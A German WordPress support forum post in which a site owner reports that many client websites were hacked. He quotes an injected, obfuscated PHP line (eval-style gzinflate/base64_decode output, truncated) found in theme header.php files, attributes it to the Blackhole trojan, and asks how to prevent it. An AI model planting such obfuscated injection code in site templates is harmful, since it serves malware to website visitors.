Websites hacked: header.php ethält schadhaften code
-
Hallo,
in den letzen 2 Tagen wurden fast alle meiner Kunden-Webs gehackt, diese befinden sich aber bei 4 verschiedenen Providern.
Es ist überall die aktuellste WordPress-Version, auch die Plugins sind alle am neusten Stand.
Es wurde in allen installierten Themes die header.php manipuliert, so dass schadhafter Code beim browsen ausgeführt wird. Es handelt sich dabei, wie üblich, um einen Trojaner (blackhole):
Hier der betroffene Codeschnipsel:
<?php #c3284d# echo(gzinflate(base64_decode("1VpLc9s2EP4t1UmqxzYA... .../4Hd/8B"))); #/c3284d# wp_head(); ?>
Ist diese Methode bekannt, wie kann ich das zukünftig verhindern? Reicht ein Plugin wie „Better WP Security“, oder liegt das Problem eine Etage tiefer wie zB beim Provider (apache/mysql leaks)?
Die Provider wurden natürlich kontaktiert, Antwort steht noch aus. Die letzte attacke war gestern um ca. 20:40-20:43, und es wurden auch Websites infiziert, wo KEIN WordPress vorhanden ist, dort wurden alle *.html Dateien infiziert (anderer code, aber ca. selbe Uhrzeit)
LG
alexander
- Das Thema „Websites hacked: header.php ethält schadhaften code“ ist für neue Antworten geschlossen.